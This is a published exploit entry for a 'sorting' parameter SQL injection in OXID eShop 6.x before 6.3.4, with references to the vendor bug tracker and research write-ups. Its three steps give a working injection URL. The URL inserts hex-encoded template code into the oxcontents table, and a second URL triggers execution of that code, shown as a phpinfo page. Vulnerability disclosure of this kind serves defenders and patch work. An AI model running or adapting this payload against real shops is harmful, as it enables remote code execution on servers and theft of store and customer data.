41 lines
No EOL
1.4 KiB
Text
41 lines
No EOL
1.4 KiB
Text
# Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection
|
|
# Date: 2019-07-29
|
|
# Exploit Author: VulnSpy
|
|
# Vendor Homepage: https://www.oxid-esales.com/
|
|
# Software Link: https://github.com/OXID-eSales/oxideshop_ce
|
|
# Version: Versions 6.x (prior to 6.3.4)
|
|
# Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc
|
|
# CVE:
|
|
|
|
1. Click on any product item in the web page
|
|
|
|
```bash
|
|
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
|
|
```
|
|
|
|
2..Add `sorting` parameter after the URL of item detail ( Insert PHP code
|
|
to database via SQL injection )
|
|
|
|
```bash
|
|
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert
|
|
into
|
|
oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)
|
|
|
|
VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1,
|
|
0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
|
|
1, 0x76756c6e73707964656d6f,
|
|
0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
|
|
0x434d53464f4c4445525f55534552494e464f, 0x00);%23
|
|
```
|
|
|
|
3.Accessing the following links triggers PHP code execution and will
|
|
display the PHPINFO page if exploited successfully.
|
|
|
|
```bash
|
|
http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
|
|
```
|
|
|
|
Ref:
|
|
* https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
|
|
* https://blog.ripstech.com/2019/oxid-esales-shop-software/
|
|
* https://bugs.oxid-esales.com/view.php?id=7002 |